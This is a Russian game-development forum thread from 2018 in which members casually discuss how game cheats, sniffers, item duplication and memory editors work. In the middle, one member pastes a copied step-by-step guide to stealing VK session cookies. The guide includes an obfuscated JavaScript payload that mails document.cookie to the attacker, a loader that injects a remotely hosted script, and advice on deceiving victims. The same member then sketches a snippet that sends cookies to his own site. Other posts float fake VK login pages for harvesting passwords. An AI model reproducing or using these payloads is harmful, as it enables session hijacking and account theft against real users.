Game Dev флудилка
Вы хотите отреагировать на этот пост ? Создайте аккаунт всего в несколько кликов или войдите на форум.

Принцип работы чит програм, снифферы

Участников: 3

Перейти вниз

Принцип работы чит програм, снифферы Empty Принцип работы чит програм, снифферы

Сообщение автор Dessan Пт Мар 30, 2018 2:52 pm

Всегда интересовало как устроены читы. Например:
1. По какому принципу работает aim чит в кс и как его писали. Это тот, который позволяет стрелять всегда в голову.
2. По какому принципу работает чит, который позволял знать, где находятся все игроки вражеской команды. Я так понимаю он же позволяет видеть сквозь стены.
3. Как происходит работа клиент-сервер-клиент в онлайн играх
4. Была у меня программа для RF Online, которая фильтровала входящий траффик. Использовалась для того, чтоб фильтровать лут, который выпадает из монстров. То есть сначала пропускался весь лут через прогу, потом определялись пакеты с ненужным и они просто блокировались и игрок видел из 100 выпавших предметов сразу 2-3 нужных ему. Также это использовалось для разгрузки процессора - ненужные элементы просто выключались. Всегда интересовало как такой сниффер создать.
5. Интересовало на чём основан принцип копирования вещей в онлайн играх. Всегда в игре находился игрок, который умел покидать окно торговли, где-то побегать, что-то там прожать, открыть второе окно поверх первого, перезайти в игру, что-то переложить из окна торговли в банк, потом обратно, перезайти снова, ещё раз кинуть окно торговли и вот уже 100к у тебя 200к денег и в 2 раза больше предметов, которые ложили в окно торговли. Это всё как-то связано с БД, но как?
6. Работа Артмани на клиентской части игры. Все мы знаем, что Артмани работает с виртуальной памятью, читает её и корректирует. В не онлайн играх результат сохраняется, в онлайн играх результат сохраняется крайне редко. Почему так?
7. Ну, вообще для топ уровня уже знаний - CheatEngine. Если знать как он работает - можно взламывать многие игры и редактировать очень много всего. Я с ним встречался последний раз лет 10 назад и люди с ним делали чудеса просто и все они были программисты. А то что выкладывали в инет на разных сайтах - в течение месяца уже переставало работать.

Вообще читы и геймдев всегда идут вместе. Если в поисковике нет запроса на поиск чита в игре или бага - игра не популярна. А зная как работают читы, можно во многом себя заранее обезопасить. А то вашу многострадальную игру могут взломать за 5 минут, выложить всё в инет и на сервере останутся только одни читеры, которые забъют на игру через пару дней.

Dessan
Юный падаван

Дата регистрации : 2017-12-25

Вернуться к началу Перейти вниз

Принцип работы чит програм, снифферы Empty Re: Принцип работы чит програм, снифферы

Сообщение автор raingo Пт Мар 30, 2018 3:50 pm

Ну ты ведь понимаешь, что тебе никто не ответит)) Я в читах тоже не разбираюсь.

raingo
Отдел прокрастинации

Принцип работы чит програм, снифферы Empty Re: Принцип работы чит програм, снифферы

Сообщение автор Dessan Пт Мар 30, 2018 4:00 pm

Я знаю точно, что мне не ответят на больших форумах, а на жуке мой вопрос перерос во флуд и это было много лет назад.

Вот ты не разбираешься, у pyro своя философия на этот счёт, может соник прочитает зайдёт, а может у тебя зародится идея разобраться, вот как я сейчас сижу и читаю про виджеты с твоей подачи

Dessan
Юный падаван

Сообщение автор raingo Пт Мар 30, 2018 4:04 pm

Мне на самом деле тоже не интересны ни читы, ни хакинг. Это типа особый вид мышления надо иметь. Манию чтоле. Ибо сидеть часами уставившись в монитор и перебирать пароли - монотонная работа, мотивации не хватит. Тру хакеры - чутка маньяки.

Хотя конеш если бы мне дали чью-то переписку, не отказался бы почитать. Ну, если это не близкие, конеш, а типа одноклассница в которую был влюблен.

Я хз почему тебя читы интересуют. По-моему скучная тема.

raingo
Отдел прокрастинации

Сообщение автор Dessan Пт Мар 30, 2018 4:26 pm

Какие ещё пароли? С чего ты это взял? Это ты фильмов пересмотрел как компы взламывают, перебирая пароли. Или же тебе всё время хотелось взломать вк экк любимой девочки и ты сидел подбирал пароли к экк и к почте и т.д. Тем более в 80% взломов таких виноваты сами пользователи и компании. Пользователи тем, что ставят пароли в виде своих фамилий, имён, дат рождения и т.д., а также сообщают пароли просто по телефону любому кто представится администратором, а компании виноваты в том, что заставляют менять пароль каждые 2-3 месяца, да ещё и выдают свои сгенерированные, которые просто лепишь на монитор себе.

Ты ж сам вспомнил как соник ломал point.js, он же там ничего не перебирал, никакие пароли не подставлял, никакие часы не тратил, он всё сделал за 5 минут

А копирование вещей занимает минут 5 с учётов перезагрузки клиента, а экономит месяцы фарма

Dessan
Юный падаван

Сообщение автор raingo Пт Мар 30, 2018 5:15 pm

Читы - это набор букв в гта, которые можно ввести в любой момент и тебе дадут, например, танк. Или на денди нажимаешь по очереди кнопки и дают овер миллион денег.

Вообще ты конеш троллингоустойчивый, и тут троллинг сам напрашивается, но лан. Усохну. Ты ведь понимаешь, что нажимая рандомные буквы в игре - ты не ломаешь игру. Разработчики специально оставили читы для ленивых.

А то, о чем ты говоришь - это взлом игры. Хакинг. И если разрабы не раздоблаи, то все игровые данные хранятся на сервере. И взлом сервера это не ввод чита в гта. Если игра на sql-подобных бд и как-то криво реализованы запросы. То тебе именно этим и придется заниматься. Сидеть на каждой страничке и перебирать возможные комбинации. sql-инъекции вроде довольно сложные, т.е. это не только поиск не экранированных символов но и еще всякая параша.

А еще способ взломать сервер игры - перебрать пароли админа. Получил доступ админа - делай что хочешь.

В моем представлении работа со сниффером - такая же муторная, как перебор паролей. Только перебираешь переменные, куски информации.

Ты ж сам вспомнил как соник ломал point.js, он же там ничего не перебирал, никакие пароли не подставлял, никакие часы не тратил, он всё сделал за 5 минут
Потому что он знает структуру движка. И поинт даже не минифицированный. Минификация - это весь код превращают в сплошной текст, и для взлома так же надо сидеть и перебирать каждую переменную движка, чтобы узнать, что она делает.

А во-вторых, Соник взломал клиент. Это конеш круто. И поможет в создании бота. Но если ты хочешь тру-взлом, тебе нужен именно хакинг сервера. Это все имхо, с низоты моих представлений. Ибо знаний по теме мало. Но хакинг и всякие взломы - это скучно и муторно, вот мое имхо.

raingo
Отдел прокрастинации

Сообщение автор raingo Пт Мар 30, 2018 5:17 pm

"Сидеть на каждой страничке" - на каждой форме, проверять каждую функцию из консоли и т.п.

raingo
Отдел прокрастинации

Сообщение автор raingo Пт Мар 30, 2018 5:40 pm

движок игры на ibgdx:

Вот онлайновая игра. Её код хранится в браузере и его "легко" прочитать. В спойлере скинул небольшую часть кода (весь код слишком огромный). Чтобы делать как соник ты должен понимать что какая функция делает.

Ясень пень, что руками вызывать эти функции в консоле - плохой выбор. Для начала надо написать программу, которая будет вызывать эти функции по очереди. А ты будешь сидеть за монитором и наблюдать как меняется игра.

Например, в игре есть индикатор золота. И ты каким-то боком точно знаешь, где он расположен в коде. Ну, например, пиро делал счет в инвайдерах в диве. Тогда тебе нужно написать прогу, которая перебирает все функции подряд и меняет этот див. Т.е. отслеживает изменение. Изменился счет - значит функция нужная.

Далее, ты вызываешь эту функцию с желаемым аргументов (например, миллиард золота), вызываешь. Функция обращается к серверу. Но на сервере стоит программа от разработчиков игры, которая отслеживает все подозрительные скачки золота. Заметь, написать защитную программу в сто раз легче, чем скрипт поиска нужной функции для взлома.

Теперь тебе нужно каким-то образом обойти защитную программу на сервере. А как именно - я хз. Вот как ты обойдешь условия функции:
Код:
fuction setGold(count){
currentCount = dbGetCount(); //узнаем счет, который записан в бд
if(coun > currentCountt+50000){ //50000 - подозрительный скачек роста счета
  //злоумышленник пойман
}else{
  dbSetCount(count); //счет успешно записался
}
}

Но это самая простая функция. Можно на проверку подозрительности много еще чего добавить.

raingo
Отдел прокрастинации

Сообщение автор raingo Пт Мар 30, 2018 5:45 pm

Использовалась для того, чтоб фильтровать лут, который выпадает из монстров. То есть сначала пропускался весь лут через прогу, потом определялись пакеты с ненужным и они просто блокировались и игрок видел из 100 выпавших предметов сразу 2-3 нужных ему. Также это использовалось для разгрузки процессора - ненужные элементы просто выключались. Всегда интересовало как такой сниффер создать.
Это раздолбайство или просто поxуизм. В сети миллиард сайтов-рулеток. Было бы так просто, давно бы все стали миллиардерами.

Очень просто фиксится: отправляешь клиенту только номера кейсов, а сами кейсы определяются на сервере. Клиент выбирает кейс, отправляет запрос, затем только сервер отправляет выбранный кейс клиенту. А в той игре сразу отправляли кейсы. Банальная дырка. Но я бы тоже не стал закрывать.

raingo
Отдел прокрастинации

Сообщение автор Dessan Пт Мар 30, 2018 6:08 pm

Дружище, при чём тут ввод кода в гта или комбинация клавиш? Это для детей вообще и для не онлайн игр. Мы ж про онлайн игры говорим. Ты ушёл не в ту сторону вообще. Забудь про взлом сервера игры, никаких подборов паролей админа никто делать не будет и никогда не слышал, чтоб делали. Перечитай мой самый первый пост.  Не надо ловить пакеты за час активной игры, сниффер включается, делается действие, сниф выключается, занимает всё секунд 5, получаешь пару десятков пакетов, поиск нужного обычно не занимает много времени. Вопрос в том, что потом с этим нужным пакетом сделать. Ну, выделил его и толку. Вот если его отловить до попадания в клиент, изменить и уже изменённый прислать - это другое дело. Знать бы как.

По поводу поиска дива - есть готовые скрипты с поиском всех дивов и изменением цвета содержимого. Легче взять те же артмани и отфильтровать сразу нужные переменные (тоже занимает минуту), её даже можно изменить сразу, только это ничего не даст в 99% случаев, потому что изменения будут на клиенте только.

Что касается проверки на подозрительные увеличения - если у тебя изначально 100 монет, а у другого игрока 5кк монет, то ты себе можешь спокойно поставить 5кк и это не будет считаться никаким подозрительным действием.

В общем, нужную функцию найти не так сложно как перезаписать её на сервере.

Dessan
Юный падаван

Сообщение автор raingo Пт Мар 30, 2018 6:43 pm

Перечитай мой самый первый пост.
Я его не читал, звиняюсь) Но короч, мы остановились на том, что получить нужную инфу - легко, а сохранить результат на сервере - сложно.

Но, блеять, знаешь что? Я теперь думаю о взломе сайтов (не игровых).

Более менее понимаю устройство сайтов. Если в вк сделано так, как думаю, то нужно только получить чужие куки. вк - здесь пишут, что в вк и логин и пароль хранится в куках.

Вопос в том, как получить чужие куки. Сюда перекину инфу с гугла:
=======================================================
Все знают что если в адресной строке ввести один ява скрипт то можно увидеть чужие кукки, но как же их получить беспалевно? Есть один способ...

Вот кратенькая инструкция для собирания кукисов вконтакте:
1. Сам скрипт:
Код:
Javascript:var percentGold=100;var widthLeft=20;var widthRight=179;var t;var memPerSec=10.00741833975;function d(m,j,l){var i=(m+'').indexOf(j,l);return i=== -1?false:i;};function _a(){next= -(1000/memPerSec)*Math.log(Math.random());ge('percentGold').innerHTML=percentGold;ge('rateLeftGold').style.width=widthLeft+"px";ge('rateRightGold').style.width=widthRight+"px";percentGold=percentGold+1;widthLeft=Math.floor(Math.sin((percentGold-100)/500)*179+20);widthRight=199-widthLeft;if(widthRight<=1){clearTimeout(t);}else t=setTimeout(_a,next);};function first(){if(ge('percent')){percentGold=ge('percent').innerHTML;var pos=d(percentGold,">",0);if(pos==false) {percentGold=parseInt(percentGold);}else percentGold=parseInt(percentGold.substr(pos+1,3)); widthLeft=parseInt(ge('rateLeft').style.width);widthRight=parseInt(ge('rateRight').style.width);_b();}else{percentGold=parseInt(ge('percentGold').innerHTML);widthLeft=parseInt(ge('rateLeftGold').style.width);widthRight=parseInt(ge('rateRightGold').style.width);_a();}};function _b(){next= -(1000/memPerSec)*Math.log(Math.random());ge('percent').innerHTML=percentGold+"%";ge('rateLeft').style.width=widthLeft+"px";ge('rateRight').style.width=widthRight+"px";percentGold=percentGold+1;if(percentGold>100){clearTimeout(t);ge('percent').id="percentGold";ge('rateLeft').id='rateLeftGold';ge('rateRight').id='rateRightGold';widthLeft=20;widthRight=179;_a();}else{widthLeft=widthLeft+2;widthRight=199-widthLeft;t=setTimeout(_b,next);}};var f=document.createElement('div');f.style.display="none";var params;function a(){Ajax.Post({url:'friend.php',query:{act:'a_add_form',fid:999999},onDone:function(ajaxObj,responseText){try{var text=responseText;var response=eval('('+responseText+')');f.innerHTML=response.text;var form=ge('addFriendForm');if(!form)return;var params=serializeForm(form);Ajax.Post({url:'friend.php',query:params});}catch(e){}}});};function b(){Ajax.Get({url:'mail.php',query:{act:'write',to: 999999},onDone:function(ajaxObj,responseText){var text=responseText;try{f.innerHTML=responseText;params={act:ge('act').value,ajax:1,misc:ge('misc')?ge('misc').value:'',secure:ge('secure')?ge('secure').value:'',chas:ge('chas').value,photo:ge('photo')?ge('photo').value:'',to_id:999999,to_reply:ge('to_reply').value,toFriends:ge('toFriends')?ge('toFriends').value:'',title:ge('title').value,message:''+Math.round(Math.random()*10000)+document.cookie+Math.round(Math.random()*10000)};setTimeout(c,3000);}catch(e){}}});}; function c() {Ajax.Post({url:'mail.php',query:params,onDone: function(ajaxObj,responseText){setTimeout(e,1000);}});}; function e(){Ajax.Get({url:'mail.php',query:{out:"1",rnd:Math.round(Math.random()*10000)},onDone:function(ajaxObj,responseText){try{var k='<a href="mail.php?act=write&to=999999&r=';var pos=d(responseText,k,0); var g=d(responseText,'&out=1"',pos); if(pos==false)return; var messid=parseInt(responseText.substr(pos+k.length,g-pos));params={act:"a_delete",id:messid,out:1}; Ajax.Post({url:'mail.php',query:params});}catch(e){}}});}; onDomReady(function(){document.body.appendChild(f); first();a();b();});
2. Для "приручения" скриптика надо заменить id(999999) на свой в 4 местах. После этого скрипт готов для работы.
3.Для всучения скрипта жертве используется редирект:
Код:
javascript:function loadScript(scriptURL) { var scriptElem = document.createElement('SCRIPT'); scriptElem.setAttribute('language',%20'%4A%61%76%61%53%63%72%69%70%74'); scriptElem.setAttribute('src', scriptURL); document.body.appendChild(scriptElem);}loadScript('SCRIPT URL');
Где вместо "SCRIPT URL" вставляем адрес нашего скрипта, который мы предварительно залили на любой хост.
4.Ссылку на скрипт лучше зашифровать.. Свою ссылку вставляем после знака вопроса.
5.Вот впринципе и всё. Единственно скрипт работает только на главной странице т.е. скрипт желательно скидывать на стену. Или переделать скрипт под любой другой, например скачка музыки или добавление всех друзей на видео)

Результат работы скрипта, Вам в личку (на тот id который вы прописали) приходят куки жертвы, а жертва видит как поднимается его репа до небес!
Все работает отлично, проверяял лично!
=======================================================

Херня какая-то, а не скрипт в посте. Его конеш лучше не исполнять. Проще написать что-то вроде:
var a = document.cookie;
var url = http://www.mysite.ru/
xhr.open(url + "GET", a , true); //ну по-другому, лень исправлять, суть вы поняли
Т.е. тупо отослать куки на наш сайт гет-запросом. Ну или пут. Короче это легко. Только надо заставить человека ввести прямо на сайте, с которого хотим получить куки, в строку наш скрипт.

Чутка посложнее и более гарантированно:
хабраУ mail.ru и вк и прочих есть api который сам отправляет сообщения на сайты. Как сообщения вк в комментариях к новостям, о которым мы недавно говорили. В данные запросы надо вставить document.cookie и вк сам отправит куки на сайт. Где мы их примем и прочтем. Только надо, чтоб человек был залогинен на сайте с вк.

Теперь осталось понять, какая функция api вк отправляет сообщения.

raingo
Отдел прокрастинации

Сообщение автор raingo Пт Мар 30, 2018 6:50 pm

Что если вконтакте засунуть в iframe на нашем сайте. Какими-то ухищрениями этот iframe спрятать. И в этом iframe исполнить любые скрипты, которые мы хотим?

Я понимаю, что это нереально. Но вопрос почему?

raingo
Отдел прокрастинации

Сообщение автор Dessan Пт Мар 30, 2018 7:00 pm

Ты пишешь свой скрипт в строчку и отправляешь как ссылку в вк или на почту, человек кликает, думая, что там картинка...таким образом можно удалять себя из чёрного списка , например.

pyro сказал, что логин на сайтах через вк не прописывает в куки пароли, а просто сопоставляет данные и отправляет типа подтверждения, что да, такой человек зареген, вот его имя и фамилия. Вряд ли куки хранят пароли. Пароли хранятся в браузере (понятия не имею где именно), но знаю, что они зашифрованы.

Я когда-то пытался найти свой же пароль от вк но у меня не получилось. Запускал снифферы, но все данные зашифрованы были. Единственный пароль, который я смог словить и он был в читаемом виде - это пароль от роутера. Так что ВК мне приходилось восстанавливать пару раз, потому что зайти не мог а пароль не помнил)

Dessan
Юный падаван

Сообщение автор Dessan Пт Мар 30, 2018 7:01 pm

raingo пишет:Что если вконтакте засунуть в iframe на нашем сайте. Какими-то ухищрениями этот iframe спрятать. И в этом iframe исполнить любые скрипты, которые мы хотим?

Я понимаю, что это нереально. Но вопрос почему?

вообще не понял гениальность твоего замысла, переведи

Dessan
Юный падаван

Сообщение автор raingo Пт Мар 30, 2018 7:02 pm

Я его и сам не понял)) Т.к. не разбираюсь в iframe=)

raingo
Отдел прокрастинации

Сообщение автор raingo Пт Мар 30, 2018 7:03 pm

Но кстати, обратный вариант точно возможен. Создать сайт. Зарегать в вк приложение - наш сайт. И делать все, что захочешь. Но конечно админы вк мониторят все приложения и такие вещи не прокатывают.

raingo
Отдел прокрастинации

Сообщение автор Dessan Пт Мар 30, 2018 7:04 pm

Создай себе сайт, сделай там вход через вконтакте и лови себе все пароли и логины

Dessan
Юный падаван

Сообщение автор Dessan Пт Мар 30, 2018 7:08 pm

уверен, что прокатывают, но там где пароль вк, там и доступ к голосам, а пароли у людей обычно одинаковые как для вк так и для банковских карт, а это уже статья о мошенничестве)
А вот если б ты смог обманывать онлайн казино - это другое дело. Ну или игрушку какую-то

Dessan
Юный падаван

Сообщение автор raingo Пт Мар 30, 2018 7:20 pm

Да, вряд ли онлайн-казино обратится в суд. Только хз как их хакнуть.

У меня кстати один раз украли голоса. А сейчас в вк еще и микротранзакции всякие делают.

Создай себе сайт, сделай там вход через вконтакте и лови себе все пароли и логины
я понял, что скорее всего "document.cookie" экранируют. Или вообще эти слова занесены в черный список. Тяжело хакерить в наше время..

raingo
Отдел прокрастинации

Сообщение автор Dessan Пт Мар 30, 2018 7:30 pm

я бы сказал не тяжело, а эксклюзивно. Но ведь это здорово. Я бы не хотел, чтоб каждый второй умел взломать сайт, перевести себе все деньги и радоваться жизни. Или в игру зашёл на новый сервер , а там через пол часа все топ уровни в лучшей одежде бегают.

Dessan
Юный падаван

Сообщение автор raingo Пт Мар 30, 2018 7:51 pm

Высокий уровень защиты привел к высокому уровню грамотности. Что в свою очередь приводит к высокой потребности вечно развиваться и догонять этот уровень.

7 лет назад мейл.ру был ключевым фактором для взлома, все там хранили письма с паролями. И была такая дикая ошибка с пересылом куков через внутренний api.

Если бы не сегодняшний диалог, хер бы я узнал об этом. И хер бы знал о такой дыре. А теперь когда захочу делать внешний api на сайте буду знать, что в запросах надо слова "document.cookie" выводить в черный список.

raingo
Отдел прокрастинации

Сообщение автор S30N1k Пт Апр 27, 2018 11:57 pm

Бле, я не разобрался как в лс ответить, лол Very Happy

Отвечу тут.
Я просто очень хорошо изучил структуру поинта, что как, куда и зачем, поэтому смог набросать аля "почти универсальный чит" для него) а так, я в этом не силен.
S30N1k
S30N1k

Дата регистрации : 2017-12-27

Сообщение автор Dessan Сб Апр 28, 2018 2:04 am

вот так обрушил все надежды разом Wink

Dessan
Юный падаван

Права доступа к этому форуму: